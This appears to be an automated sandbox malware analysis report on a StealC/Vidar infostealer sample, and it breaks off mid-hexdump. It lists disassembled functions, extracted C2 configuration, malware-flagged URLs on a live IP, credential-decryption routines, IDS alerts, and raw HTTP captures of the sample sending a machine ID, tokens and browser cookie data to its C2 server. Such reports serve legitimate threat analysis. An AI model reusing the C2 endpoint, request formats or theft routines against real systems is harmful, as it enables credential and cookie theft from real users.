API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 02162acd8991c6a914586d95dc31c44eb9b5ecd88c44bc56065f95bfd9f9f01b
Instruction ID: 8065d0992f188f0df48b455bdb4611833c281f2ca02820ce74ea20121dcf4339
Opcode Fuzzy Hash: 02162acd8991c6a914586d95dc31c44eb9b5ecd88c44bc56065f95bfd9f9f01b
Instruction Fuzzy Hash: 9641E372909745DFC311CF79C491A9BB7F8BF8A348F004A5DF98497621E730D9598B82

Function 6CCD3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCD3D19
mozalloc_abort.MOZGLUE(?), ref: 6CCD3D6C

Strings

d, xrefs: 6CCD3D58

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 7c374cbde72093f348da42e394457a21cb6c519f190262fde52f8062ffa4d6a2
Instruction ID: 8bc9d6bee4e78f612d1557c7dc6c84014a94800194de2b62d80eadc85365e651
Opcode Fuzzy Hash: 7c374cbde72093f348da42e394457a21cb6c519f190262fde52f8062ffa4d6a2
Instruction Fuzzy Hash: 9D113835F14648D7EB009F6DC8144EEB379EF86304B49825DDE4557A02FB30A584C750

Function 6CCF6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CCF6E22
__Init_thread_footer.LIBCMT ref: 6CCF6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6CCF6E1D

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 760d0d4f5073e82127c44d729726fb61a50fbd1d5c5f868965c4cd748341fb96
Instruction ID: d98f96ca440d2142f7f31e02d019bda2ba1fbc21e5967045fa19bf31f1e2a38a
Opcode Fuzzy Hash: 760d0d4f5073e82127c44d729726fb61a50fbd1d5c5f868965c4cd748341fb96
Instruction Fuzzy Hash: 5AF09E3A309640DFFB008B68D866B8177756B53218F040165C56847F61F731B50BCA93

Function 6CCABED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON

Download Yara Rule

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6CCABEE3
LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CCABEF5

Strings

cryptbase.dll, xrefs: 6CCABEF0

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Library$CallsDisableLoadThread
String ID: cryptbase.dll
API String ID: 4137859361-1262567842
Opcode ID: f3ef7f8bee7f82d9fa768b27db28f0325c04139ddce01b1a693e40f95a3a0471
Instruction ID: 476597f20a9902ffe5e198a230186a3c87bdb9af954b291c6b0333eeb7a6c393
Opcode Fuzzy Hash: f3ef7f8bee7f82d9fa768b27db28f0325c04139ddce01b1a693e40f95a3a0471
Instruction Fuzzy Hash: 4CD0C73118410CFBE6406B919D1AB153778A701715F10C021F75554D91D7B1D456CF94

Function 6CCEB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CCEB2C9,?,?,?,6CCEB127,?,?,?,?,?,?,?,?,?,6CCEAE52), ref: 6CCEB628

Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE90FF
Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CCEB2C9,?,?,?,6CCEB127,?,?,?,?,?,?,?,?,?,6CCEAE52), ref: 6CCEB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CCEB2C9,?,?,?,6CCEB127,?,?,?,?,?,?,?,?,?,6CCEAE52), ref: 6CCEB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CCEB127,?,?,?,?,?,?,?,?), ref: 6CCEB74D

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 5fc20e5c254072250eb6cda5dd096b9d7678da14efc366b459f158b497132f31
Instruction ID: 23d70665d4e98018c35eeb2411a66ae3d709f2edaffed551119d27435c35b83c
Opcode Fuzzy Hash: 5fc20e5c254072250eb6cda5dd096b9d7678da14efc366b459f158b497132f31
Instruction Fuzzy Hash: DC51C2B1A053168FDB14CF19C99076EB7B5FF8A304F45852DC85AABB10E731E904CBA5

Function 6CCE6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CCE6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CCE6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CCE6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCE6F5C

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 47f7fa239278b97a78076bc34278f447220a912037527e0c836cfb3485bf1a88
Instruction ID: eb611553d9ce78377079d16694ecec6b48cae57c3ddbae53e79d4a093472623a
Opcode Fuzzy Hash: 47f7fa239278b97a78076bc34278f447220a912037527e0c836cfb3485bf1a88
Instruction Fuzzy Hash: 1431C771A20A0A8FEB04CF2CC9417AA73E9FB8A344F50453DD51AC7651FB31E659C7A1

Function 6CCFB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CCA0A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCFB67F

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: c87b46076c34e9ece79f69c0d35e01ae0bddce816c5476dab95dd72009ddcc59
Instruction ID: baac1d6c5fc1bf64683acbe86ab40b01a99e3735565666260304b028d538c54f
Opcode Fuzzy Hash: c87b46076c34e9ece79f69c0d35e01ae0bddce816c5476dab95dd72009ddcc59
Instruction Fuzzy Hash: 2A312771A002168FEB14CF58C85465EBBF6FF80304F168529C826DB701EB31E916CBE0

Function 6CCCF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6CCCF611
memcpy.VCRUNTIME140(?,?,?), ref: 6CCCF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6CCCF652
memcpy.VCRUNTIME140(?,?,?), ref: 6CCCF668

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: f99658b38495d5d0a41b75037526f394819f1d708e1e960997f0478820b32f98
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: F8313E71B00214AFC714CF5ECCC0A9A77B5FBC8354B14853DEA498BB14E671F9448BA1

Function 6CCE26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCE26C1
free.MOZGLUE(?), ref: 6CCE26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCE26FF
free.MOZGLUE ref: 6CCE270D

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4ef7814f92b862d057353cbd3583289d370d8442e2ed3a2e1885dab63136f572
Instruction ID: 3630a8817d228a2485bd39bbd5429261e1b2d0a4d4406c974578f6d99a9082ce
Opcode Fuzzy Hash: 4ef7814f92b862d057353cbd3583289d370d8442e2ed3a2e1885dab63136f572
Instruction Fuzzy Hash: 3EF0F4B27012025BF7009E58DC89B4BB3ADEF4A218B100135EA1AD3B02F331F919C6A2

Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpxC	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dllH	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phprowser	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpnd9f1	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpainnet	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll0	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpgr	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll&	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpti	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpi	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpg	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dllr	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll8L	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/2M	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpmo	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dllT	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpirefox	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php=C	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dllF	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpin	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpem	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpwsApps	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php5	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dllh	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dllZ	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.980000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.980000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00989B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00989B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0098C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0098C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00989AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00989AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00987240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00987240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00998EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00998EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CCA6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6CCA6C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49706 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.9:49706 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.9:49706
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.9:49706 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.9:49706
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.9:49706 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 39 35 30 32 45 44 39 31 44 45 33 37 31 32 36 35 39 37 38 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="hwid"7C9502ED91DE3712659782------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build"save------HCGCBFHCFCFBFIEBGHJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGCHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 2d 2d 0d 0a Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="message"browsers------FHJKKECFIECAKECAFBGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="message"plugins------DGDBKFBAKFBFHIECFBFI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 47 48 4a 44 42 46 49 49 44 47 44 48 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"52f130bf4edcaa90f7d9824dcd0badeb5ef774b84fff40b9969b2fec5c507c9eecf8dc66------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="message"fplugins------CFHCGHJDBFIIDGDHIJDB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 185.215.113.37Content-Length: 5895Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 31 33 30 62 66 34 65 64 63 61 61 39 30 66 37 64 39 38 32 34 64 63 64 30 62 61 64 65 62 35 65 66 37 37 34 62 38 34 66 66 66 34 30 62 39 39 36 39 62 32 66 65 63 35 63 35 30 37 63 39 65 65 63 66 38 64 63 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 